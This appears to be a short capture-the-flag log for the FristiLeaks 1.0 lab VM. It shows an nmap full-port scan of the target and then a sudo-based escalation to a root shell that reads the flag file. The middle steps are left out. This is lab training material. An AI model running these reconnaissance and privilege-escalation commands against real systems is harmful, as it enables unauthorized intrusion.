➜ ~ nmap -sS -p- -T4 -v -A 192.168.1.174 NSE: Loaded 148 scripts for scanning. NSE: Script Pre-scanning. Initiating NSE at 19:53 Completed NSE at 19:53, 0.00s elapsed Initiating NSE at 19:53 Completed NSE at 19:53, 0.00s elapsed Initiating ARP Ping Scan at 19:53 Scanning 192.168.1.174 [1 port] Completed ARP Ping Scan at 19:53, 0.01s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 19:53 Completed Parallel DNS resolution of 1 host. at 19:53, 0.01s elapsed Initiating SYN Stealth Scan at 19:53 Scanning 192.168.1.174 [65535 ports] Discovered open port 80/tcp on 192.168.1.174 PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3) | http-methods: | Supported Methods: GET HEAD POST OPTIONS TRACE |_ Potentially risky methods: TRACE | http-robots.txt: 3 disallowed entries |_/cola /sisi /beer |_http-server-header: Apache/2.2.15 (CentOS) DAV/2 PHP/5.3.3 |_http-title: Site doesn't have a title (text/html; charset=UTF-8). MAC Address: 08:00:27:A5:A6:76 (Oracle VirtualBox virtual NIC)
bash-4.1$ sudo -u fristi ./doCom /bin/bash sudo -u fristi ./doCom /bin/bash bash-4.1# whoami whoami root bash-4.1# ls /root/ ls /root/ fristileaks_secrets.txt bash-4.1# cat /root/fristileaks_secrets.txt cat /root/fristileaks_secrets.txt Congratulations on beating FristiLeaks 1.0 by Ar0xA [https://tldr.nu]
I wonder if you beat it in the maximum 4 hours it's supposed to take! Shoutout to people of #fristileaks (twitter) and #vulnhub (FreeNode) Flag: Y0u_kn0w_y0u_l0ve_fr1st1